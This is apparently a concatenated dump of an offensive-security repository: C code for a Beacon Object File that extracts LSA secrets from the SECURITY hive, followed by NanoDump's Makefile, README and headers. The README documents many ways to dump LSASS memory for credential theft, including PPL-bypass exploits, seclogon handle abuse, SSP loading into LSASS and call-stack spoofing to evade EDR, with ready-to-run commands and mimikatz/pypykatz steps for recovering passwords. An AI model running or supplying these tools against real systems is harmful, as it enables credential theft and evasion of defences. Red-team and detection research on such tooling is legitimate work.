    ADVAPI32$RegCloseKey(hSystem);

    res = ADVAPI32$RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"SECURITY", 0, KEY_READ, &hSecurity);
    if (res != ERROR_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[!] Failed to open SECURITY: %d (requires SYSTEM privileges)\n", res);
        return;
    }

    GetDomainInfo(hSecurity);

    if (!ADVAPI32$CryptAcquireContextA(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT)) {
        BeaconPrintf(CALLBACK_ERROR, "[!] CryptAcquireContext failed\n");
        goto cleanup;
    }

    if (!GetLsaKeys(hSecurity, sysKey, hProv, &lsaInfo)) {
        BeaconPrintf(CALLBACK_ERROR, "[!] Failed to extract LSA keys\n");
        ADVAPI32$CryptReleaseContext(hProv, 0);
        goto cleanup;
    }

    FormatHex(lsaInfo.currentKey, lsaInfo.currentKeySize, hexStr, sizeof(hexStr));
    BeaconPrintf(CALLBACK_OUTPUT, "LSA Key(s) : %u, default {%02x%02x%02x%02x-%02x%02x-%02x%02x-%02x%02x-%02x%02x%02x%02x%02x%02x}\n",
        lsaInfo.nbKeys,
        lsaInfo.currentKeyId[3], lsaInfo.currentKeyId[2], lsaInfo.currentKeyId[1], lsaInfo.currentKeyId[0],
        lsaInfo.currentKeyId[5], lsaInfo.currentKeyId[4],
        lsaInfo.currentKeyId[7], lsaInfo.currentKeyId[6],
        lsaInfo.currentKeyId[8], lsaInfo.currentKeyId[9],
        lsaInfo.currentKeyId[10], lsaInfo.currentKeyId[11], lsaInfo.currentKeyId[12], lsaInfo.currentKeyId[13], lsaInfo.currentKeyId[14], lsaInfo.currentKeyId[15]);
    BeaconPrintf(CALLBACK_OUTPUT, "  [00] {%02x%02x%02x%02x-%02x%02x-%02x%02x-%02x%02x-%02x%02x%02x%02x%02x%02x} %s\n",
        lsaInfo.currentKeyId[3], lsaInfo.currentKeyId[2], lsaInfo.currentKeyId[1], lsaInfo.currentKeyId[0],
        lsaInfo.currentKeyId[5], lsaInfo.currentKeyId[4],
        lsaInfo.currentKeyId[7], lsaInfo.currentKeyId[6],
        lsaInfo.currentKeyId[8], lsaInfo.currentKeyId[9],
        lsaInfo.currentKeyId[10], lsaInfo.currentKeyId[11], lsaInfo.currentKeyId[12], lsaInfo.currentKeyId[13], lsaInfo.currentKeyId[14], lsaInfo.currentKeyId[15],
        hexStr);

    EnumerateSecrets(hSecurity, &lsaInfo, hProv);

    FreeMem(lsaInfo.keys);
    ADVAPI32$CryptReleaseContext(hProv, 0);

cleanup:
    ADVAPI32$RegCloseKey(hSecurity);
}


================================================
FILE: Creds-BOF/nanodump/LICENSE
================================================
MIT License

Copyright (c) 2024 Fortra

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.


================================================
FILE: Creds-BOF/nanodump/Makefile
================================================
BOFNAME := nanodump
CC_x64 := x86_64-w64-mingw32-gcc
CC_x86 := i686-w64-mingw32-gcc
GCC := gcc
STRIP_x64 := x86_64-w64-mingw32-strip
STRIP_x86 := i686-w64-mingw32-strip
OPTIONS := -masm=intel -Wimplicit-function-declaration -Wall -I include -Wl,--dynamicbase
PPL_MEDIC_OPTIONS := -Wno-trigraphs -DPASS_PARAMS_VIA_NAMED_PIPES=1
SSP_OPTIONS := -DPASS_PARAMS_VIA_NAMED_PIPES=1

nanodump:
	@(mkdir dist 2>/dev/null) && echo 'creating dist' || echo 'dist exists'

	@$(CC_x64) source/spoof_callstack.c source/hw_breakpoint.c source/shtinkering.c source/dinvoke.c source/utils.c source/handle.c source/impersonate.c source/modules.c source/syscalls.c source/token_priv.c source/malseclogon.c source/nanodump.c source/werfault.c source/entry.c -o dist/$(BOFNAME).x64.exe $(OPTIONS) -DNANO -DEXE
	@$(STRIP_x64) --strip-all dist/$(BOFNAME).x64.exe

	@$(CC_x86) source/spoof_callstack.c source/hw_breakpoint.c source/shtinkering.c source/dinvoke.c source/utils.c source/handle.c source/impersonate.c source/modules.c source/syscalls.c source/token_priv.c source/malseclogon.c source/nanodump.c source/werfault.c source/entry.c -o dist/$(BOFNAME).x86.exe $(OPTIONS) -DNANO -DEXE
	@$(STRIP_x86) --strip-all dist/$(BOFNAME).x86.exe

	@$(CC_x64) -c source/entry.c -o dist/$(BOFNAME).x64.o $(OPTIONS) -DNANO -DBOF
	@$(STRIP_x64) --strip-unneeded dist/$(BOFNAME).x64.o && echo '[+] nanodump x64' || echo '[!] nanodump x64'

	@$(CC_x86) -c source/entry.c -o dist/$(BOFNAME).x86.o $(OPTIONS) -DNANO -DBOF
	@$(STRIP_x86) --strip-unneeded dist/$(BOFNAME).x86.o && echo '[+] nanodump x86' || echo '[!] nanodump x86'

	@$(GCC) source/bin2c.c -o dist/bin2c -static -s -Os

	@$(CC_x64) source/utils.c source/handle.c source/modules.c source/syscalls.c source/token_priv.c source/nanodump.c source/dinvoke.c source/pipe.c source/entry.c -o dist/$(BOFNAME)_ssp.x64.dll $(OPTIONS) $(SSP_OPTIONS) -DNANO -DSSP -DDDL -shared
	@$(STRIP_x64) --strip-all dist/$(BOFNAME)_ssp.x64.dll && echo '[+] nanodump_ssp Dll x64' || echo '[!] nanodump_ssp Dll x64'
	@./dist/bin2c dist/$(BOFNAME)_ssp.x64.dll $(BOFNAME)_ssp_dll > include/$(BOFNAME)_ssp_dll.x64.h

	@$(CC_x86) source/utils.c source/handle.c source/modules.c source/syscalls.c source/token_priv.c source/nanodump.c source/dinvoke.c source/pipe.c source/entry.c -o dist/$(BOFNAME)_ssp.x86.dll $(OPTIONS) $(SSP_OPTIONS) -DNANO -DSSP -DDDL -shared
	@$(STRIP_x86) --strip-all dist/$(BOFNAME)_ssp.x86.dll && echo '[+] nanodump_ssp Dll x86' || echo '[!] nanodump_ssp Dll x86'
	@./dist/bin2c dist/$(BOFNAME)_ssp.x86.dll $(BOFNAME)_ssp_dll > include/$(BOFNAME)_ssp_dll.x86.h

	@$(CC_x64) -c source/ssp/ssp.c -o dist/$(BOFNAME)_ssp.x64.o $(OPTIONS) $(SSP_OPTIONS) -DBOF -DSSP
	@$(STRIP_x64) --strip-unneeded dist/$(BOFNAME)_ssp.x64.o && echo '[+] nanodump_ssp x64' || echo '[!] nanodump_ssp x64'

	@$(CC_x86) -c source/ssp/ssp.c -o dist/$(BOFNAME)_ssp.x86.o $(OPTIONS) $(SSP_OPTIONS) -DBOF -DSSP
	@$(STRIP_x86) --strip-unneeded dist/$(BOFNAME)_ssp.x86.o && echo '[+] nanodump_ssp x86' || echo '[!] nanodump_ssp x86'

	@$(CC_x64) source/utils.c source/syscalls.c source/dinvoke.c source/pipe.c source/ssp/ssp_utils.c source/ssp/ssp.c -o dist/$(BOFNAME)_ssp.x64.exe $(OPTIONS) $(SSP_OPTIONS) -DEXE -DSSP
	@$(STRIP_x64) --strip-all dist/$(BOFNAME)_ssp.x64.exe

	@$(CC_x86) source/utils.c source/syscalls.c source/dinvoke.c source/pipe.c source/ssp/ssp_utils.c source/ssp/ssp.c -o dist/$(BOFNAME)_ssp.x86.exe $(OPTIONS) $(SSP_OPTIONS) -DEXE -DSSP
	@$(STRIP_x86) --strip-all dist/$(BOFNAME)_ssp.x86.exe

	@$(CC_x64) source/spoof_callstack.c source/hw_breakpoint.c source/shtinkering.c source/output.c source/ppl/cleanup.c source/utils.c source/dinvoke.c source/handle.c source/impersonate.c source/modules.c source/syscalls.c source/token_priv.c source/nanodump.c source/entry.c -o dist/$(BOFNAME)_ppl_dump.x64.dll $(OPTIONS) -DNANO -DPPL_DUMP -DDDL -shared
	@$(STRIP_x64) --strip-all dist/$(BOFNAME)_ppl_dump.x64.dll && echo '[+] nanodump_ppl_dump Dll x64' || echo '[!] nanodump_ppl_dump Dll x64'
	@./dist/bin2c dist/$(BOFNAME)_ppl_dump.x64.dll $(BOFNAME)_ppl_dump_dll > include/$(BOFNAME)_ppl_dump_dll.x64.h

	@$(CC_x86) source/spoof_callstack.c source/hw_breakpoint.c source/shtinkering.c source/output.c source/ppl/cleanup.c source/utils.c source/dinvoke.c source/handle.c source/impersonate.c source/modules.c source/syscalls.c source/token_priv.c source/nanodump.c source/entry.c -o dist/$(BOFNAME)_ppl_dump.x86.dll $(OPTIONS) -DNANO -DPPL_DUMP -DDDL -shared
	@$(STRIP_x86) --strip-all dist/$(BOFNAME)_ppl_dump.x86.dll && echo '[+] nanodump_ppl_dump Dll x86' || echo '[!] nanodump_ppl_dump Dll x86'
	@./dist/bin2c dist/$(BOFNAME)_ppl_dump.x86.dll $(BOFNAME)_ppl_dump_dll > include/$(BOFNAME)_ppl_dump_dll.x86.h

	@$(CC_x64) source/utils.c source/syscalls.c source/dinvoke.c source/token_priv.c source/ppl/ppl_utils.c source/impersonate.c source/ppl/ppl.c source/ppl/ppl_dump.c -o dist/$(BOFNAME)_ppl_dump.x64.exe $(OPTIONS) -DEXE -DPPL_DUMP
	@$(STRIP_x64) --strip-all dist/$(BOFNAME)_ppl_dump.x64.exe

	@$(CC_x86) source/utils.c source/syscalls.c source/dinvoke.c source/token_priv.c source/ppl/ppl_utils.c source/impersonate.c source/ppl/ppl.c source/ppl/ppl_dump.c -o dist/$(BOFNAME)_ppl_dump.x86.exe $(OPTIONS) -DEXE -DPPL_DUMP
	@$(STRIP_x86) --strip-all dist/$(BOFNAME)_ppl_dump.x86.exe

	@$(CC_x64) -c source/ppl/ppl.c -o dist/$(BOFNAME)_ppl_dump.x64.o $(OPTIONS) -DBOF -DPPL_DUMP
	@$(STRIP_x64) --strip-unneeded dist/$(BOFNAME)_ppl_dump.x64.o && echo '[+] nanodump_ppl_dump x64' || echo '[!] nanodump_ppl_dump x64'

	@$(CC_x86) -c source/ppl/ppl.c -o dist/$(BOFNAME)_ppl_dump.x86.o $(OPTIONS) -DBOF -DPPL_DUMP
	@$(STRIP_x86) --strip-unneeded dist/$(BOFNAME)_ppl_dump.x86.o && echo '[+] nanodump_ppl_dump x86' || echo '[!] nanodump_ppl_dump x86'

	@$(CC_x64) source/spoof_callstack.c source/hw_breakpoint.c source/shtinkering.c source/output.c source/ppl/cleanup.c source/utils.c source/dinvoke.c source/handle.c source/impersonate.c source/modules.c source/syscalls.c source/token_priv.c source/nanodump.c source/ppl/ppl_medic_dll.c source/pipe.c source/entry.c -o dist/$(BOFNAME)_ppl_medic.x64.dll $(OPTIONS) $(PPL_MEDIC_OPTIONS) -DNANO -DPPL_MEDIC -DDDL -shared
	@$(STRIP_x64) --strip-all dist/$(BOFNAME)_ppl_medic.x64.dll && echo '[+] nanodump_ppl_medic Dll x64' || echo '[!] nanodump_ppl_medic Dll x64'
	@./dist/bin2c dist/$(BOFNAME)_ppl_medic.x64.dll $(BOFNAME)_ppl_medic_dll > include/$(BOFNAME)_ppl_medic_dll.x64.h

	@$(CC_x64) source/utils.c source/syscalls.c source/dinvoke.c source/handle.c source/token_priv.c source/ppl/ppl_utils.c source/impersonate.c source/ppl/ppl.c source/ppl/ppl_medic.c source/pipe.c source/ppl/ppl_medic_client.c -o dist/$(BOFNAME)_ppl_medic.x64.exe $(OPTIONS) $(PPL_MEDIC_OPTIONS) -DEXE -DPPL_MEDIC -DNANO
	@$(STRIP_x64) --strip-all dist/$(BOFNAME)_ppl_medic.x64.exe

	@$(CC_x64) -c source/ppl/ppl.c -o dist/$(BOFNAME)_ppl_medic.x64.o $(OPTIONS) $(PPL_MEDIC_OPTIONS) -DBOF -DPPL_MEDIC
	@$(STRIP_x64) --strip-unneeded dist/$(BOFNAME)_ppl_medic.x64.o && echo '[+] nanodump_ppl_medic x64' || echo '[!] nanodump_ppl_medic x64'

	@$(GCC) source/restore_signature.c -o scripts/restore_signature -static -s -Os
	@$(STRIP_x64) --strip-all scripts/restore_signature

clean:
	@rm -f dist/*


================================================
FILE: Creds-BOF/nanodump/README.md
================================================
# NanoDump

A flexible tool that creates a minidump of the LSASS process.

<h2>Table of contents</h2>

<ol>
  <li><a href="#usage">Usage</a></li>
  <li><a href="#features">Features</a></li>
  <li><a href="#combinations">Combining Techniques</a></li>
  <li><a href="#examples">Examples</a></li>
</ol>

<h2 id="usage">1. Usage</h2>

```
Usage:   nanodump [-w DUMP_PATH] [--valid] [-d] [-de] [-slr SLR_BIN_PATH] [-sd] [-sc] [-spe SPE_DUMP_FOLDER] [-sk] [--fork] [--snapshot] [-eh] [--getpid] [--pid PID]

Arguments:
    [-w DUMP_PATH]          : STRING.   Filename of the dump
    [--valid]               : BOOL.     Create a dump with a valid signature
    [-d]                    : BOOL.     Duplicate: a high privileged existing LSASS handle
    [-de]                   : BOOL.     Duplicate-elevate: a low privileged existing LSASS handle and then elevate it
    [-slr SLR_BIN_PATH]     : STRING.   Seclogon-leak-remote: leak an LSASS handle into another process via seclogon and duplicate it
    [-sd]                   : BOOL.     Seclogon-duplicate: make seclogon open a handle to LSASS and duplicate it
    [-sc]                   : BOOL.     Spoof-callstack: open a handle to LSASS using a fake calling stack
    [-spe SPE_DUMP_FOLDER]  : STRING.   Silent-process-exit: force WerFault.exe to dump LSASS via SilentProcessExit
    [-sk]                   : BOOL.     Force WerFault.exe to dump LSASS via Shtinkering (Need SYSTEM)
    [--fork]                : BOOL.     Fork the target process before dumping
    [--snapshot]            : BOOL.     Snapshot the target process before dumping
    [-eh]                   : BOOL.     Elevate-handle: open a handle to LSASS with low privileges and duplicate it to gain higher privileges
    [--getpid]              : BOOL.     Print the PID of LSASS and leave
    [--pid PID]             : INT.      PID of LSASS
```

<h3>Run</h3>

Run the `nanodump` command in the agent console or the `nanodump.x64.exe` binary.

<h3>Restore the signature</h3>

If you didn't specify the `--valid` flag, you need to restore the invalid signature
```zsh
scripts/restore_signature <dumpfile>
```

<h3>Get the secretz</h3>

<b>mimikatz:</b>  
To get the secrets simply run:
```sh
mimikatz.exe "sekurlsa::minidump <dumpfile>" "sekurlsa::logonPasswords full" exit
```

<b>pypykatz:</b>  
If you prefer to stay on linux, you can use the python3 port of mimikatz called [pypykatz](https://github.com/skelsec/pypykatz):  
```sh
python3 -m pypykatz lsa minidump <dumpfie>
```

<h2 id="features">2. Features</h2>

<h3>Process forking</h2>

To avoid opening a handle to LSASS with `PROCESS_VM_READ`, you can use the `--fork` parameter.  
This will make nanodump create a handle to LSASS with `PROCESS_CREATE_PROCESS` access and then create a 'clone' of the process. This new process will then be dumped. While this will result in a process creation and deletion, it removes the need to read LSASS directly.

<h3>Snapshot</h2>

Similarly to the `--fork` option, you can use `--snapshot` to create a snapshot of the LSASS process.  
This will make nanodump create a handle to LSASS with `PROCESS_CREATE_PROCESS` access and then create a snapshot of the process using `PssNtCaptureSnapshot`. This new process will then be dumped. The snapshot will be freed automatically upon completion.

<h3>Handle duplication</h2>

As opening a handle to LSASS can be detected, nanodump can instead search for existing handles to LSASS.  
If one is found, it will copy it and use it to create the minidump.  
Note that it is not guaranteed to find such a handle.

<h3>Elevate handle</h2>

You can obtain a handle to LSASS with PROCESS_QUERY_LIMITED_INFORMATION, which is likely to be whitelisted, and then elevate that handle by duplicating it.

<h3>Seclogon handle leak local</h2>

To avoid opening a handle to LSASS, you can use abuse the seclogon service by calling `CreateProcessWithLogonW` to leak an LSASS handle into the nanodump binary.  
To enable this feature, use the `--seclogon-leak-local` parameter.  
Take into account that when used from Cobalt Strike, an unsigned nanodump binary needs to be written to disk to use this feature.

<h3>Seclogon handle leak remote</h2>

This technique is very similar to the previous one, but instead of leaking the handle into nanodump, it is leaked into another binary and then duplicated so that nanodump can used it.
Use the `-slr` flag to access this functionality.

<h3>Seclogon handle duplication</h2>

You can trick the seclogon process into opening a handle to LSASS and duplicating it before it is closed, by winning a race condition using file locks.
Use the `-sd` flag to access this functionality.

<h3>Load nanodump as an SSP</h2>

You can load nanodump as an SSP in LSASS to avoid opening a handle.  
When the DLL has been loaded into LSASS, the parameters will be passed via a named pipe and once the dump is completed, `DllMain` will return FALSE to make LSASS unload the nanodump DLL.  
You can hardcode the parameters into the DLL and avoid using the named pipe altogether with the compiler flag `PASS_PARAMS_VIA_NAMED_PIPES=0`.

<h4>Upload and load a nanodump DLL</h3>

By default, an unsigned nanodump DLL will be uploaded to the Temp folder which will be deleted automatically.
```
nanodump_ssp --valid -w C:\Windows\Temp\lsass.dmp
```

If you want to load a pre-existing DLL, you can run:
```
nanodump_ssp --valid -w C:\Windows\Temp\lsass.dmp --load-dll C:\Windows\Temp\ssp.dll
```

<h3>PPL Dump exploit</h2>
If LSASS is running as Protected Process Light (PPL), you can try to bypass it using a userland exploit discovered by Project Zero. If it is successful, the dump will be written to disk.  

> Note that this vulnerability has been fixed in the July 2022 update pack (Windows 10 21H2 Build 19044.1826)

To access this feature, use the `nanodump_ppl_dump` command
```
nanodump_ppl_dump --valid -w C:\Windows\Temp\lsass.dmp
```

<h3>PPL Medic exploit</h2>
Nanodump also implements the PPLMedic exploit, which works on systems that have the July 2022 update pack.  
The parameters will be passed to the nanodump DLL via a named pipe. You can hardcode the parameters into the DLL and avoid using the named pipe altogether with the compiler flag PASS_PARAMS_VIA_NAMED_PIPES=0.  

To access this feature, use the `nanodump_ppl_medic` command
```
nanodump_ppl_medic --valid -w C:\Windows\Temp\lsass.dmp
```

<h3>WerFault</h2>
You can force the WerFault.exe process to create a full memory dump of LSASS. Take into consideration that this requires the ability to write to the registry

Because the dump is not made by nanodump, it will always have a valid signature.

<h4>Silent Process Exit</h3>

To leverage the Silent Process Exit technique, use the `-spe` parameter and the path where the dump should be created.
```
nanodump -spe C:\Windows\Temp\
```

A dump of the nanodump process will also be created, similar to this:
```
PS C:\> dir 'C:\Windows\Temp\lsass.exe-(PID-648)-4035593\'

Directory: C:\Windows\Temp\lsass.exe-(PID-648)-4035593

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         6/23/2022   7:40 AM       58830409 lsass.exe-(PID-648).dmp
-a----         6/23/2022   7:40 AM        7862825 nanodump.x64.exe-(PID-3224).dmp
```

<h4>Shtinkering</h3>

You can also use the Shtinkering technique, which requires nanodump to run under SYSTEM:
```
nanodump -sk
```

The dump will tipically be created under `C:\Windows\system32\config\systemprofile\AppData\Local\CrashDumps`

<h3>Spoof the callstack</h2>

You can open a handle to LSASS with a fake callstack to make the function call look a bit more legitimate (especially if run as BOF).  
To access this feature, use the paramter `-sc`.

<h2 id="combinations">3. Combining techniques</h2>

You can combine many techniques to customize how nanodump operates.  
The following table indicates which flags can be used together.

|            | --write | --valid | -d | -eh | -de | --slr | -sd | -sc | -spe | -sk | --fork | --snapshot | SSP | PPL_DUMP | PPL_MEDIC |
|------------|:-------:|:-------:|:--:|:---:|:---:|:-----:|:---:|:---:|:----:|:---:|:------:|:----------:|:---:|:--------:|:---------:|
| --write    | ✓       | ✓       | ✓  |  ✓  |  ✓  | ✓     |  ✓  |  ✓  |      |     | ✓      | ✓          |     | ✓        | ✓         |
| --valid    | ✓       | ✓       | ✓  |  ✓  |  ✓  | ✓     |  ✓  |  ✓  |      |     | ✓      | ✓          |     | ✓        | ✓         |
| -d         | ✓       | ✓       | ✓  |     |     |       |     |     |      |  ✓  | ✓      | ✓          |     | ✓        |           |
| -eh        | ✓       | ✓       |    |  ✓  |     |       |     |  ✓  |      |  ✓  | ✓      | ✓          |     |          | ✓         |
| -de        | ✓       | ✓       |    |     |  ✓  |       |     |     |      |  ✓  | ✓      | ✓          |     |          |           |
| --slr      | ✓       | ✓       |    |     |     | ✓     |     |     |      |  ✓  | ✓      | ✓          |     |          |           |
| -sd        | ✓       | ✓       |    |     |     |       |  ✓  |     |      |  ✓  | ✓      | ✓          |     |          |           |
| -sc        | ✓       | ✓       |    |  ✓  |     |       |     |  ✓  |      |  ✓  | ✓      | ✓          |     |          |           |
| -spe       |         |         |    |     |     |       |     |     |  ✓   |     |        |            |     |          |           |
| -sk        |         |         | ✓  |  ✓  |  ✓  | ✓     |  ✓  |  ✓  |      |  ✓  |        |            |     |          |           |
| --fork     | ✓       | ✓       | ✓  |  ✓  |  ✓  | ✓     |  ✓  |  ✓  |      |     | ✓      |            |     |          |           |
| --snapshot | ✓       | ✓       | ✓  |  ✓  |  ✓  | ✓     |  ✓  |  ✓  |      |     |        | ✓          |     |          |           |
| SSP        |         |         |    |     |     |       |     |     |      |     |        |            | ✓   |          |           |
| PPL_DUMP   | ✓       | ✓       | ✓  |     |     |       |     |     |      |     |        |            |     | ✓        |           |
| PPL_MEDIC  | ✓       | ✓       |    |  ✓  |     |       |     |     |      |     |        |            |     |          | ✓         |

<h2 id="examples">4. Examples</h2>

Read LSASS indirectly by creating a fork and write the dump to disk with an invalid signature:
```
nanodump --fork -w C:\lsass.dmp
```

Use the seclogon leak remote to leak an LSASS handle in a notepad process, duplicate that handle to get access to LSASS, then read it indirectly by creating a fork and downloading the dump with a valid signature:
```
nanodump -slr C:\Windows\notepad.exe --fork --valid
```

Download the dump with an invalid signature (default):
```
nanodump
```

Duplicate an existing handle and write the dump to disk with an invalid signature:
```
nanodump -d -w C:\Windows\Temp\report.docx
```

Get the PID of LSASS:
```
nanodump --getpid
```

Load nanodump in LSASS as an SSP (a nanodump binary will be uploaded!):
```
nanodump_ssp -w C:\Windows\Temp\lsass.dmp
```

Dump LSASS bypassing PPL using the PPLDump exploit, duplicating the handle that csrss.exe has on LSASS:
```
nanodump_ppl_dump --d --write C:\Windows\Temp\lsass.dmp
```

Dump LSASS bypassing PPL using the PPLMedic exploit, opening a low privileged handle to LSASS and then elevating it:
```
nanodump_ppl_medic -eh --write C:\Windows\Temp\lsass.dmp
```

Trick seclogon into opening a handle to LSASS and duplicate it, then download the dump with an invalid signature:
```
nanodump -sd
```

Open a handle to LSASS with a spoofed callstack and download the minidump with an invalid signature:
```
nanodump -sc
```

Use the Shtinkering techinque:
```
nanodump -sk
```

Obtain a handle with low privs and elevate it using _elevate handle_:
```
nanodump -eh
```

Obtain a handle with low privs using a spoofed callstack and elevate it using _elevate handle_:
```
nanodump -eh -sc
```

Duplicate an existing low priv handle and elevate it using _elevate handle_:
```
nanodump -de
```

## Credits
- [skelsec](https://twitter.com/skelsec) for writing [minidump](https://github.com/skelsec/minidump), which was crucial for learning the minidump file format.
- [freefirex](https://twitter.com/freefirex2) from [CS-Situational-Awareness-BOF](https://github.com/trustedsec/CS-Situational-Awareness-BOF) at Trustedsec for many cool tricks for BOFs
- [Jackson_T](https://twitter.com/Jackson_T) for [SysWhispers2](https://github.com/jthuraisamy/SysWhispers2)
- [BillDemirkapi](https://twitter.com/BillDemirkapi) for [Process Forking](https://billdemirkapi.me/abusing-windows-implementation-of-fork-for-stealthy-memory-operations/)
- [Antonio Cocomazzi](https://twitter.com/splinter_code) for [Abusing leaked handles to dump LSASS memory](https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-2.html) and [Racing for LSASS dumps](https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html)
- [xpn](https://twitter.com/_xpn_) for [Exploring Mimikatz - Part 2 - SSP](https://blog.xpnsec.com/exploring-mimikatz-part-2/)
- [Matteo Malvica](https://twitter.com/matteomalvica) for [Evading WinDefender ATP credential-theft: a hit after a hit-and-miss start](https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/)
- [James Forshaw](https://twitter.com/tiraniddo) for [Windows Exploitation Tricks: Exploiting Arbitrary Object Directory Creation for Local Elevation of Privilege](https://googleprojectzero.blogspot.com/2018/08/windows-exploitation-tricks-exploiting.html)
- [itm4n](https://twitter.com/itm4n) for the original PPL userland exploits implementation, [PPLDump](https://github.com/itm4n/PPLdump) and [PPLMedic](https://github.com/itm4n/PPLmedic).
- [Asaf Gilboa](https://mobile.twitter.com/asaf_gilboa) for [Lsass Memory Dumps are Stealthier than Ever Before - Part 2](https://www.deepinstinct.com/blog/lsass-memory-dumps-are-stealthier-than-ever-before-part-2) and the Shtinkering technique
- [William Burgess](https://twitter.com/joehowwolf) for [Spoofing Call Stacks To Confuse EDRs](https://labs.withsecure.com/blog/spoofing-call-stacks-to-confuse-edrs)
- [Sebastian Feldmann](https://twitter.com/thefLinkk) and [Fabian](https://twitter.com/testert01) for the _elevate handle_ technique discussed at [Morph Your Malware!](https://www.youtube.com/watch?v=AucQUjJBJuw)


================================================
FILE: Creds-BOF/nanodump/include/adaptix.h
================================================
#pragma once

#include "beacon.h"

DECLSPEC_IMPORT void AxAddScreenshot(char* note, char* data, int len);
DECLSPEC_IMPORT void AxDownloadMemory(char* filename, char* data, int len);


================================================
FILE: Creds-BOF/nanodump/include/beacon.h
================================================
/*
 * Beacon Object Files (BOF)
 * -------------------------
 * A Beacon Object File is a light-weight post exploitation tool that runs
 * with Beacon's inline-execute command.
 *
 * Cobalt Strike 4.1.
 */

#pragma once

 /* data API */
typedef struct {
	char* original; /* the original buffer [so we can free it] */
	char* buffer;   /* current pointer into our buffer */
	int    length;   /* remaining length of data */
	int    size;     /* total size of this buffer */
} datap;

DECLSPEC_IMPORT void    BeaconDataParse(datap* parser, char* buffer, int size);
DECLSPEC_IMPORT int     BeaconDataInt(datap* parser);
DECLSPEC_IMPORT short   BeaconDataShort(datap* parser);
DECLSPEC_IMPORT int     BeaconDataLength(datap* parser);
DECLSPEC_IMPORT char* BeaconDataExtract(datap* parser, int* size);

/* format API */
typedef struct {
	char* original; /* the original buffer [so we can free it] */
	char* buffer;   /* current pointer into our buffer */
	int    length;   /* remaining length of data */
	int    size;     /* total size of this buffer */
} formatp;

DECLSPEC_IMPORT void    BeaconFormatAlloc(formatp* format, int maxsz);
DECLSPEC_IMPORT void    BeaconFormatReset(formatp* format);
DECLSPEC_IMPORT void    BeaconFormatFree(formatp* format);
DECLSPEC_IMPORT void    BeaconFormatAppend(formatp* format, char* text, int len);
DECLSPEC_IMPORT void    BeaconFormatPrintf(formatp* format, char* fmt, ...);
DECLSPEC_IMPORT char* BeaconFormatToString(formatp* format, int* size);
DECLSPEC_IMPORT void    BeaconFormatInt(formatp* format, int value);

/* Output Functions */
#define CALLBACK_OUTPUT      0x0
#define CALLBACK_OUTPUT_OEM  0x1e
#define CALLBACK_ERROR       0x0d
#define CALLBACK_OUTPUT_UTF8 0x20

DECLSPEC_IMPORT void   BeaconPrintf(int type, char* fmt, ...);
DECLSPEC_IMPORT void   BeaconOutput(int type, char* data, int len);

/* Token Functions */
DECLSPEC_IMPORT BOOL   BeaconUseToken(HANDLE token);
DECLSPEC_IMPORT void   BeaconRevertToken(VOID);
DECLSPEC_IMPORT BOOL   BeaconIsAdmin(VOID);

/* Spawn+Inject Functions */
DECLSPEC_IMPORT void   BeaconGetSpawnTo(BOOL x86, char* buffer, int length);
DECLSPEC_IMPORT void   BeaconInjectProcess(HANDLE hProc, int pid, char* payload, int p_len, int p_offset, char* arg, int a_len);
DECLSPEC_IMPORT void   BeaconInjectTemporaryProcess(PROCESS_INFORMATION* pInfo, char* payload, int p_len, int p_offset, char* arg, int a_len);
DECLSPEC_IMPORT void   BeaconCleanupProcess(PROCESS_INFORMATION* pInfo);

/* Utility Functions */
DECLSPEC_IMPORT BOOL   toWideChar(char* src, wchar_t* dst, int max);


================================================
FILE: Creds-BOF/nanodump/include/delete_file.h
================================================
#pragma once

#include "utils.h"
#include "syscalls.h"
#include "nanodump.h"
#include "beacon.h"

VOID do_delete(
    IN LPSTR file_path);


================================================
FILE: Creds-BOF/nanodump/include/dinvoke.h
================================================
#pragma once

#include <windows.h>
#include <winternl.h>

#include "utils.h"

#define LdrLoadDll_SW2_HASH 0xA301ECDA

#define MZ 0x5A4D

typedef NTSTATUS(WINAPI* LdrLoadDll_t)(PWCHAR, ULONG, PUNICODE_STRING, PHANDLE);

typedef struct _ND_LDR_DATA_TABLE_ENTRY
{
    struct _LIST_ENTRY InLoadOrderLinks;
    struct _LIST_ENTRY InMemoryOrderLinks;
    struct _LIST_ENTRY InInitializationOrderLinks;
    PVOID DllBase;
    PVOID EntryPoint;
    ULONG SizeOfImage;
    UNICODE_STRING FullDllName;
    UNICODE_STRING BaseDllName;
} ND_LDR_DATA_TABLE_ENTRY, *PND_LDR_DATA_TABLE_ENTRY;

typedef struct _ND_PEB_LDR_DATA
{
    ULONG Length;
    UCHAR Initialized;
    PVOID SsHandle;
    struct _LIST_ENTRY InLoadOrderModuleList;
    struct _LIST_ENTRY InMemoryOrderModuleList;
    struct _LIST_ENTRY InInitializationOrderModuleList;
} ND_PEB_LDR_DATA, *PND_PEB_LDR_DATA;

typedef struct _ND_PEB
{
    BYTE Reserved1[2];
    BYTE BeingDebugged;
    BYTE Reserved2[1];
    PVOID Reserved3[2];
    PND_PEB_LDR_DATA Ldr;
} ND_PEB, *PND_PEB;

PVOID find_dll_by_pointer(
    IN PVOID address);

BOOL is_dll(
    IN HMODULE hLibrary);

PVOID find_legacy_export(
    IN HMODULE hOriginalLibrary,
    IN DWORD fhash);

PVOID resolve_reference(
    IN HMODULE hOriginalLibrary,
    IN PVOID addr);

